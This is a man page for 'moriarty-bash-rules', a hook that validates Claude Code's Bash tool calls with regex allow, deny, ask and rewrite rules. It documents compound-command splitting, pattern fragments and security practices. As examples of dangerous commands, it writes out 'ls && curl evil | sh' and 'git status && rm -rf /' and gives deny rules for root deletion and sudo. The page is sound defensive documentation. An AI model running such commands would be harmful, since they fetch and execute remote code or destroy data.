.\" Copyright (c) 2025 Moriarty contributors
.\" SPDX-License-Identifier: GPL-3.0-only
.Dd July 2025
.Dt MORIARTY\-BASH\-RULES 5
.Os
.Sh NAME
.Nm moriarty\-bash\-rules
.Nd bash command validation rules and pattern fragments for moriarty
.Sh DESCRIPTION
Bash rules provide command\-level validation specifically for Bash tool calls
in Claude Code.
They are configured as
.Ic [[bash_rules]]
entries in
.Pa ~/.config/moriarty/tool_rules.toml
and are evaluated only when no tool rule
.Pq see Xr moriarty\-tool\-rules 5
has matched the Bash tool call.
.Pp
Rules are evaluated top\-to\-bottom with
.Em first\-match\-wins
semantics.
Place more specific rules before general ones.
.Sh COMPOUND COMMANDS
Before matching, the hook parses each Bash command with a real shell parser and evaluates every
leaf simple\-command of a compound command independently, then merges the per\-leaf decisions.
A pattern therefore needs to describe only a single command, not a whole
.Ql a && b | c ; d
pipeline.
.Bl -bullet
.It
Operators and redirects are split off each leaf, so a simple
.Ql ^ls
matches the
.Ql ls
leaf of
.Ql ls | wc -l .
.It
Merge precedence: any denied leaf denies the whole command; otherwise any leaf that asks, or that
matches no rule, prompts; only an all\-allowed command is allowed.
A dangerous tail can no longer hide behind a safe head \(em
.Ql ls && curl evil | sh
prompts and is never auto\-allowed.
.It
A leaf that redirects to a real file
.Pq not /dev/null, and not an fd duplication such as 2>&1
has any Allow capped at Ask.
.It
A command containing command substitution
.Pq Ql $(...) ,
backticks, a subshell, process substitution, a here\-document, or another compound construct
.Pq if, for, while, case, [[ ]], ((...))
cannot be analyzed: only an explicit Deny matching the whole command is honored, and every other
outcome becomes a prompt.
.It
In\-cwd absolute paths in a leaf are normalized to their relative remainder before matching, so
.Ql ^cat src/
matches
.Ql cat /abs/cwd/src/x .
.El
.Pp
Allow\-rules can therefore be simple prefixes without enumerating pipes, operators, or
shell\-metacharacter exclusions.
A pattern still needs to guard a program's
.Em own
ability to run code or write files
.Pq for example Ql find -exec , sed -i, or xargs ,
which are not shell\-level and so are invisible to the splitter.
Use
.Ql moriarty test bash-rules --explain
to see how a command splits and which rule matches each leaf, and
.Ql moriarty rules lint
to find rules the hook silently ignores.
.Sh CONFIGURATION
.Ss File Location
.Pa ~/.config/moriarty/tool_rules.toml
.Pp
The path respects
.Ev XDG_CONFIG_HOME
if set.
.Ss Rule Structure
.Bd -literal -offset indent
[[bash_rules]]
name = "descriptive\-name"
pattern = "regex\-pattern"
action = { type = "ActionType", ... }
.Ed
.Ss Fields
.Bl -tag -width Ds
.It Ic name
A descriptive name for the rule, used in log output.
.It Ic pattern
A regular expression
.Pq Rust regex syntax
to match against the bash command.
Pattern fragments may be used with
.Ql {{fragment_name}}
syntax; see
.Sx PATTERN FRAGMENTS .
.It Ic action
The action to take when the pattern matches.
See
.Sx ACTIONS .
.El
.Sh ACTIONS
.Ss Allow
Explicitly allow the command to execute without user confirmation.
.Bd -literal -offset indent
[[bash_rules]]
name = "allow\-git\-status"
pattern = "^git\e\es+status"
action = { type = "Allow" }
.Ed
.Ss Deny
Block the command and show an error message to the user.
.Bd -literal -offset indent
[[bash_rules]]
name = "deny\-rm\-rf"
pattern = "^rm\e\es+\-rf\e\es+/"
action = { type = "Deny", value = "Recursive delete of root is not allowed" }
.Ed
.Ss Modify
Transform the command before execution using regex capture groups
.Pq $0, $1, $2, etc. .
.Bd -literal -offset indent
[[bash_rules]]
name = "add\-dry\-run"
pattern = "^(docker\e\es+system\e\es+prune)"
action = { type = "Modify", value = "$1 \-\-dry\-run" }
.Ed
.Pp
.Sy Security Warning :
Modify actions use unescaped capture group replacement.
Avoid patterns like
.Ql ^docker (.*)
that capture arbitrary input.
Use specific patterns like
.Ql ^(docker\e\es+system\e\es+prune)$
instead.
.Ss Ask
Defer to the user for case\-by\-case authorization.
Claude Code will prompt the user to approve or deny.
.Bd -literal -offset indent
[[bash_rules]]
name = "ask\-for\-sudo"
pattern = "^sudo\e\eb"
action = { type = "Ask" }
.Ed
.Ss ArgumentFilter
Structurally remove, add, or replace command arguments before execution.
Unlike
.Cm Modify ,
.Cm ArgumentFilter
manipulates arguments as discrete tokens,
making it easier to handle flags regardless of their position.
.Pp
.Sy Important :
After filtering, the modified command is automatically re\-validated
against all rules.
The filtered command must match an
.Cm Allow
rule (or be manually approved via
.Cm Ask )
to execute.
Chained ArgumentFilter rules are prevented to avoid infinite loops.
.Pp
.Em Removing arguments :
.Bd -literal -offset indent
[[bash_rules]]
name = "cargo\-doc\-no\-browser"
pattern = "^cargo doc.*\-\-open"
action = { type = "ArgumentFilter", remove = ["\-\-open", "\-o"],
           reason = "Browser flags removed" }
.Ed
.Pp
The
.Ic remove
field supports exact matches
.Pq Ql \-\-open
and prefix matches
.Pq Ql \-\-open No also removes Ql \-\-open=browser .
Arguments are removed regardless of position.
.Pp
.Em Adding arguments :
.Bd -literal -offset indent
[[bash_rules]]
name = "docker\-run\-safety"
pattern = "^docker run(?!.* \-\-read\-only)"
action = { type = "ArgumentFilter",
           add = ["\-\-read\-only", "\-\-security\-opt=no\-new\-privileges"],
           reason = "Added security restrictions" }
.Ed
.Pp
Arguments are appended to the end of the command.
.Pp
.Em Replacing arguments
.Pq combining remove and add :
.Bd -literal -offset indent
[[bash_rules]]
name = "rm\-force\-interactive"
pattern = "^rm .*\-f"
action = { type = "ArgumentFilter",
           remove = ["\-f", "\-\-force"],
           add = ["\-i"],
           reason = "Replaced force with interactive" }
.Ed
.Pp
.Em Operation order :
.Bl -enum -offset indent -compact
.It
Remove specified arguments.
.It
Replace specified arguments (if the
.Ic replace
field is used).
.It
Add new arguments.
.El
.Sh PATTERN FRAGMENTS
Pattern fragments allow defining reusable regex snippets referenced in
rule patterns using
.Ql {{fragment_name}}
syntax.
.Ss Defining Fragments
.Bd -literal -offset indent
[pattern_fragments]
safe_chars = "[^|&;$\`()<>{}]"

[[bash_rules]]
name = "allow\-ls"
pattern = "^ls{{safe_chars}}*$"
action = { type = "Allow" }
.Ed
.Ss Nested Fragments
Fragments can reference other fragments.
Expansion happens in multiple passes:
.Bd -literal -offset indent
[pattern_fragments]
safe_chars = "[^|&;$\`()<>{}]"
safe_arg = "( {{safe_chars}}+)"
safe_pipe = "( \e\e| (head|tail|grep){{safe_arg}}*)"
.Ed
.Ss Built\-in Default Fragments
.Nm moriarty
provides the following default fragments:
.Bl -tag -width "safe_pipe_cmd" -compact
.It Ic safe_chars
.Ql [^|&;$\`()<>{}]
\(em characters that don't allow shell injection.
.It Ic identifier
.Ql [a\-zA\-Z_][a\-zA\-Z0\-9_\-]*
\(em valid identifier pattern.
.It Ic number
.Ql [0\-9]+
\(em numeric values.
.It Ic safe_arg
.Ql "( [^|&;$\`()<>{}]+)"
\(em safe command argument.
.It Ic safe_flag
.Ql "( \-[a\-zA\-Z_][a\-zA\-Z0\-9_\-]*)"
\(em safe command flag.
.It Ic safe_path
Safe file path (no shell metacharacters).
.It Ic safe_pipe_cmd
.Ql (head|tail|grep|wc|sort|uniq)
\(em safe pipe target commands.
.It Ic safe_pipe
Safe command piping using
.Ic safe_pipe_cmd .
.El
.Pp
User\-defined fragments with the same name override the defaults.
.Ss Fragment Naming Rules
Fragment names must start with a letter or underscore
.Pq Ql [a\-zA\-Z_]
and may contain letters, numbers, underscores, and hyphens
.Pq Ql [a\-zA\-Z0\-9_\-]* .
.Ss Circular Dependencies
Fragments cannot reference each other in a cycle.
The system detects circular dependencies and reports an error
when loading the configuration.
.Sh SECURITY BEST PRACTICES
.Bl -enum
.It
.Em Shell\-metacharacter exclusions are usually unnecessary now.
Because the engine splits operators off each leaf and bails on command/process substitution, an
allow\-rule no longer needs character classes such as
.Ql [^|&;$\`()<>{}]
to stay safe; a simple prefix like
.Ql ^ls
suffices.
See
.Sx COMPOUND COMMANDS .
.It
.Em Anchor at the start of a leaf.
Anchor allow\-rules with
.Ql ^
so they match from the start of a command rather than mid\-string.
A trailing
.Ql $
is no longer needed to stop a dangerous tail \(em
.Ql git status && rm \-rf /
is split, and the
.Ql rm
leaf is judged on its own \(em so use
.Ql $
only when you intend to match a whole leaf exactly.
.It
.Em Guard a program's own dangerous arguments.
The splitter cannot see flags that make a program run code or write files.
Keep restrictive patterns for those
.Pq for example prompt on Ql find -exec No or Ql sed -i .
.It
.Em Escape regex metacharacters.
Remember to escape
.Ql \e\e , ( , ) , [ , ] , { , } , \&. , * , + , ? , |
in patterns.
.It
.Em Order rules from specific to general.
Deny rules for dangerous commands should come before
broader allow rules.
.It
.Em Use fragments for security patterns.
Define injection\-safe character classes once and reuse them.
.El
.Sh EXAMPLES
.Ss Safe Cargo Commands
.Bd -literal -offset indent
[pattern_fragments]
safe_chars = "[^|&;$\`()<>{}]"

[[bash_rules]]
name = "cargo\-doc\-no\-browser"
pattern = "^cargo doc.*\-\-open"
action = { type = "ArgumentFilter", remove = ["\-\-open", "\-o"],
           reason = "Browser not useful for Claude" }

[[bash_rules]]
name = "cargo\-safe\-commands"
pattern = "^cargo (build|check|test|clippy|fmt|doc)( {{safe_chars}}+)*$"
action = { type = "Allow" }
.Ed
.Ss Git Operations
.Bd -literal -offset indent
[[bash_rules]]
name = "allow\-git\-read"
pattern = "^git (status|diff|log|show)"
action = { type = "Allow" }

[[bash_rules]]
name = "ask\-git\-write"
pattern = "^git (commit|push|pull|rebase)"
action = { type = "Ask" }

[[bash_rules]]
name = "deny\-git\-force"
pattern = "^git\e\es+push.*\-\-force"
action = { type = "Deny", value = "Force push is not allowed" }
.Ed
.Ss Comprehensive Security
.Bd -literal -offset indent
[pattern_fragments]
safe = "[^|&;$\`()<>{}]"
safe_arg = "( {{safe}}+)"

[[bash_rules]]
name = "deny\-rm\-rf\-root"
pattern = "^rm\e\es+\-rf\e\es+/"
action = { type = "Deny", value = "Cannot delete from root" }

[[bash_rules]]
name = "deny\-sudo"
pattern = "^sudo\e\eb"
action = { type = "Deny", value = "sudo not allowed" }

[[bash_rules]]
name = "allow\-read\-commands"
pattern = "^(ls|cat|head|tail|grep|wc|find){{safe_arg}}*$"
action = { type = "Allow" }

[[bash_rules]]
name = "allow\-cargo"
pattern = "^cargo (build|check|test|clippy|fmt){{safe_arg}}*$"
action = { type = "Allow" }
.Ed
.Sh TROUBLESHOOTING
.Bl -tag -width Ds
.It Em Rule not matching
Check logs at
.Pa ~/.local/state/moriarty/hooks/
to see which rule matched:
.Pp
.Dl tail \-f ~/.local/state/moriarty/hooks/hooks.log* | grep \(lqBash rule matched\(rq
.It Em Pattern expansion errors
Run
.Cm moriarty rules lint
to report undefined fragments, circular dependencies, invalid regexes, and any other
rules the hook silently drops.
.It Em Unexpected modifications
Check
.Cm Modify
rules and their capture groups in the logs:
.Pp
.Dl tail \-f ~/.local/state/moriarty/hooks/hooks.log* | grep \(lqCommand modified\(rq
.It Em Rules not loading
Verify the config file exists at the expected path,
check TOML syntax, and look for parse errors in the logs.
.It Em Testing patterns
Use
.Cm moriarty test bash\-rules \-\-explain Ar command
to see how a command splits into leaves and which rule matches each,
or use an online regex tester with the Rust regex flavor.
.El
.Sh FILES
.Bl -tag -width Ds
.It Pa ~/.config/moriarty/tool_rules.toml
Tool and bash rules configuration file.
.It Pa ~/.local/state/moriarty/hooks/
Log files showing rule evaluation details.
.El
.Sh SEE ALSO
.Xr moriarty 1 ,
.Xr moriarty\-tool\-rules 5
